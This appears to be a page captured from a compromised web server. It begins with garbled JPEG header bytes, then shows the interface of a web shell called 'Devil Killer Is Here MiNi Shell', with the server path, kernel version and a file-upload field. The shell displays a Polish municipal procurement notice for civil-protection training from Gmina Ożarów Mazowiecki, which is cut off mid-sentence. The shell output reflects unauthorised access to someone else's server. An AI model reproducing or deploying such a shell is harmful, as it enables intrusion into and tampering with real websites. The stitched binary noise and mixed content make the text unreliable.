JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251126/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251126/0055575601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup usługi szkoleniowej niezbędnej do realizowania zadań Ochrony Ludności i Obrony Cywilnej w Gminie Ożarów Mazowiecki z podziałem na dwie części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 731 32 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup usługi szkoleniowej niezbędnej do realizowania zadań Ochrony Ludności i Obrony Cywilnej w Gminie Ożarów Mazowiecki z podziałem na dwie części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f32eaa65-bdd6-4d9c-8d98-2071c6fce38c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00555756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00059761/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Zakup usług szkoleniowych niezbędnych do realizacji zadań Ochrony Ludności i Obrony Cywilnej w Gminie Ożarów Mazowiecki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f32eaa65-bdd6-4d9c-8d98-2071c6fce38c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Szczegółowe zasady komunikacji elektronicznej zostały określone w Rozdziale 9 SWZ.<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na ściśle określony adres e-mail:<br/>zampub@ozarow-mazowiecki.pl (nie dotyczy składania ofert w postępowaniu). Skorzystanie z tego adresu w sytuacji gdy platforma<br/>działa poprawnie spowoduje zignorowanie przesłanej wiadomości</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowo w Regulaminie Platformy e-Zamówienia, dostępnym na stronie internetowej ttps://ezamowienia.gov.pl<br/>oraz w „Centrum Pomocy”.<br/>2. Sposób sporządzenia dokumentów elektronicznych lub cyfrowego odwzorowania i poświadczania za zgodność musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. 2020 poz. 2452), dalej w treści jako: ,,rozporządzenie’’ oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii<br/>23 grudnia 20220 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może żądać<br/>Zamawiający od Wykonawcy (Dz. U. 2020 poz. 2415)<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia, których wykaz dla przedmiotowego postępowania jest<br/>podany w rozdziale 11, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako<br/>załączniki do formularzy komunikacyjnych.<br/>5. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacji nie będą miały bezpośredniego zastosowania,<br/>(o ile dotyczy)<br/>6. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, przekazywane w postępowaniu<br/>sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>7. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem dedykowanych<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W<br/>przypadku załączników, które są, zgodnie z ustawą Pzp lub rozporządzeniem, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym<br/>(otaczającym). W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości<br/>uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny).<br/>8. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych pozyskanych od Wykonawcy w ramach wykonywania Umowy jest Zamawiający.<br/>2. W ramach wykonania obowiązku informacyjnego, zgodnie z rozporządzeniem Parlamentu Europejskiego i rady (UE)2016/679 z<br/>dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich informacji danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016) - dalej<br/>RODO, Wykonawca poinformuje osoby, których jakiekolwiek dane osobowe zostały przekazane Zamawiającemu, o posiadaniu i<br/>przetwarzaniu danych osobowych tych osób przez Zamawiającego w celu wykonywania Umowy.<br/>3. Wykonawca zobowiązany jest także poinformować osoby, o których mowa powyżej, o prawie dostępu do treści danych, ich<br/>poprawiania, modyfikacji oraz możliwości skorzystania z innych uprawnień przewidzianych unormowaniami RODO.<br/>4. Dane identyfikujące Wykonawcę,przedmiot umowy i wysokość<br/>wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1 ust. 1 ustawy z dnia 6 września 2001 r. o dostępie do informacji<br/>publicznej (t.j. Dz. U. z 2019 r. poz. 1429),która podlega udostępnianiu w trybie przedmiotowej ustawy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.62.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1 Przedmiotem zamówienia jest Zakup usługi szkoleniowej niezbędnej do realizacji zadań Ochrony Ludności i Obrony Cywilnej w Gminie Ożarów Mazowiecki z podziałem na części:<br/><br/>Część A: - Przeprowadzenie cyklu szkoleń dla 90 osób z zakresu edukacji społeczeństwa – z zakresu udzielania pierwszej pomocy dla kadry pedagogicznej gminnych placówek oświatowych i osób z jednostek organizacyjnych gminy na podstawie Załącznika nr 9 „PROGRAM SZKOLENIA Z ZAKRESU OCHRONY LUDNOŚCI I OBRONY CYWILNEJ DLA LUDNOŚCI”<br/>4.1.1 Zamówienie (Część A i/lub B) należy zrealizować w terminie: do 20.12.2025r. Mając na uwadze art. 436 pkt 1 ustawy Zamawiający informuje, iż wskazanie końcowej daty terminu realizacji zamówienia wynika z faktu, iż zamówienie sfinansowane jest ze środków Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026, w ramach dotacji celowej, przekazanej z budżetu państwa. <br/>W związku z powyższym przedmiotowe zadanie musi być wykonane i rozliczone do końca roku 2025.<br/>Celem szkolenia jest przygotowanie osób przebywających na terytorium Rzeczypospolitej Polskiej do właściwych reakcji w sytuacjach zagrożeń, w tym w zakresie rozpoznawania zagrożeń, zapobiegania im oraz kształtowania odpowiednich zachowań w przypadku ich wystąpienia, a także wypracowanie zdolności współdziałania z organami ochrony ludności i podmiotami ochrony ludności. Szkolenie służy zwiększeniu odporności społecznej<br/>4.8 Wykonawca zobowiązany jest wynająć sale szkoleniową spełniającej wymogi BHP.<br/><br/>4.9 Na 2 dni przed terminem szkolenia Zamawiający dostarczy wykonawcy listę osób<br/>uprawnionych/skierowanych na szkolenie (dotyczy cz. A i B)<br/><br/>4.10 Na 3 dni przed realizacją przedmiotu zamówienia Wykonawca przedstawi Zamawiającemu harmonogram przeprowadzenia szkolenia (dotyczy cz. A i B)<br/><br/>4.12 Termin przeprowadzenia szkolenia będzie uzgodniony 2 dni po podpisaniu umowy. Zmiana terminu szkolenia będzie możliwa wyłącznie z inicjatywy Wykonawcy lub Zamawiającego, wyłącznie w uzasadnionych przypadkach, po uprzednim uzyskaniu akceptacji przedstawiciela drugiej strony.<br/>Zamawiający przewiduje możliwość realizacji przedmiotu zamówienia w 2026 r. s sytuacji gdy będzie możliwość przesunięcia środków finansowych na realizację zamówienia na następny rok.<br/>Zamawiający zastrzega sobie prawo do weryfikacji osób wyznaczonych do realizacji szkolenia wskazanych w formularzu ofertowym, w szczególności w zakresie ich kwalifikacji zawodowych, doświadczenia oraz posiadanych uprawnień (doświadczenie stanowiło podstawę przyznania punktów kryterium oceny ofert „Doświadczenie osób wyznaczanych do realizacji zamówienia” ).<br/>W przypadku stwierdzenia, że przedstawione osoby nie spełniają wymagań określonych w SWZ, Zamawiający może zażądać ich zastąpienia innymi osobami o kwalifikacjach nie niższych niż wymagane<br/><br/>4.14 Zamawiający wymaga akredytacji Akademii Pożarniczej w Warszawie, z którego wynika, że Wykonawca spełnia wymagania do prowadzenia szkoleń, o których mowa w art. 50 ust. 3 ustawy z dnia 5 grudnia 2024 o ochronie ludności i obronie cywilnej (Dz.U. z 2024 r. poz. 1907) oraz w § 11 ust. 1 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 roku w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (DZ. U. poz.162).<br/><br/>W przypadku, gdy Wykonawca jest podmiotem upoważnionym, na podstawie §11 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 06 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (Dz. U. z 2025 r., poz. 162) bez konieczności weryfikacji przez Akademię Pożarniczą jest obowiązany złożyć stosowne oświadczenie.<br/><br/>UWAGA: Wykonawca w formularzu ofertowym złoży stosowane oświadczenie o posiadaniu akredytacji Akademii Pożarniczej w Warszawie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 73170,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80600000-0 - Usługi szkolenia w zakresie obrony i materiałów bezpieczeństwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował niżej podanymi kryteriami i ich <br/>wagami:<br/><br/>A) Cena – waga kryterium – 60 %<br/><br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie przyporządkowana <br/>zostanie liczba punktów proporcjonalnie mniejsza stosując wzór:<br/><br/><br/> najniższa cena z rozpatrywanych ofert<br/>Wartość punktowa ceny = ----------------------------------------------------- x 60<br/> cena badanej oferty<br/><br/> B) Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium - 40 % <br/><br/>* ( dotyczy cz. A, B )<br/><br/>- dysponuje min. 2 osoby posiadające odpowiednie kwalifikacje zawodowe i doświadczenie dydaktyczne w prowadzeniu zajęć z tematyki objętej szkoleniem, zatrudnione na podstawie stosunku pracy lub stosunku cywilno-prawnego, z których każda spełnia co najmniej jeden z warunków wskazanych w § 11 ust. 1 pkt 3 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia, <br/>1)	posiada co najmniej stopień naukowy doktora w dyscyplinach naukowych w zakresie nauk o bezpieczeństwie, nauk o obronności, nauk wojskowych albo inżynierii bezpieczeństwa oraz wykazał dorobek naukowy w okresie ostatnich 5 /pięciu/ lat związany z tematyką prowadzonych zajęć dydaktycznych oraz udokumentowane doświadczenie dydaktyczne.<br/>2) posiada tytuł zawodowy magistra inżyniera pożarnictwa i co najmniej 5 /pięć/ lat stażu pracy lub służby w jednostkach ochrony przeciwpożarowej lub komórkach organizacyjnych administracji publicznej związanych z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym oraz udokumentowane doświadczenie dydaktyczne.<br/>3)	posiada tytuł zawodowy magistra lub magistra inżyniera na kierunku studiów związanym z bezpieczeństwem i co najmniej 5 /pięć/ lat stażu pracy lub służby w komórkach organizacyjnych administracji publicznej związanych z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym oraz udokumentowane doświadczenie dydaktyczne<br/>4)	posiada udokumentowane doświadczenie dydaktyczne i co najmniej 10 /dziesięć/ lat stażu pracy lub służby w komórkach organizacyjnych administracji publicznej związanej z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym.<br/><br/>Jeżeli Wykonawca wykaże, że osoba skierowana do realizacji zamówienia, spełniająca wymagania, o których mowa w § 11 ust. 1 pkt 3 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia, w ciągu ostatnich 3 lat przed upływem terminu składania ofert przeprowadziła:<br/><br/>a) 1-2 szkolenia w wymiarze co najmniej 5 godzin (każde szkolenie) z zakresu zarządzania kryzysowego, bezpieczeństwa lub ochrony ludności (obrony cywilnej) - Wykonawca otrzyma 10 punktów za każdą osobę,<br/>b) 3 i wiecej szkoleń w wymiarze co najmniej 5 godzin (każde szkolenie) z zakresu zarządzania kryzysowego, bezpieczeństwa lub ochrony ludności (obrony cywilnej) - Wykonawca otrzyma 20 punktów za każdą osobę;<br/><br/>UWAGA: W sytuacji, gdy Wykonawca nie złoży w ofercie oświadczenia w zakresie doświadczenia dwóch osób skierowanych do prowadzenia zajęć dydaktycznych w trakcie realizacji zamówienia oferta otrzyma 0 pkt; <br/><br/>W sytuacji, gdy Wykonawca złoży w ofercie oświadczenia w zakresie doświadczenia tylko jednej osoby skierowanej do prowadzenia zajęć dydaktycznych w trakcie realizacji zamówienia oferta otrzyma punkty tylko za wykazane doświadczenie tej osoby; <br/>Wykonawca może uzyskać za doświadczenie jednej osoby nie więcej niż 20 pkt, zaś w tym kryterium maksymalnie 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć B: - Przeprowadzenie cyklu szkoleń dla 60 osób z zakresu szkolenia specjalistyczne <br/>DLA KADRY PODMIOTÓW OCHRONY LUDNOŚCI zgodnie z PROGRAMEM SZKOLENIA Z ZAKRESU OCHRONY LUDNOŚCI I OBRONY CYWILNEJ na podstawie Załącznika nr 7 ROZPORZĄDZENIA MINISTRA SPRAW WEWNĘTRZNYCH I ADMINISTRACJI1) z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia. <br/> <br/><br/>4.1.1 Zamówienie (Część A i/lub B) należy zrealizować w terminie: do 20.12.2025r. Mając na uwadze art. 436 pkt 1 ustawy Zamawiający informuje, iż wskazanie końcowej daty terminu realizacji zamówienia wynika z faktu, iż zamówienie sfinansowane jest ze środków Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026, w ramach dotacji celowej, przekazanej z budżetu państwa. <br/>W związku z powyższym przedmiotowe zadanie musi być wykonane i rozliczone do końca roku 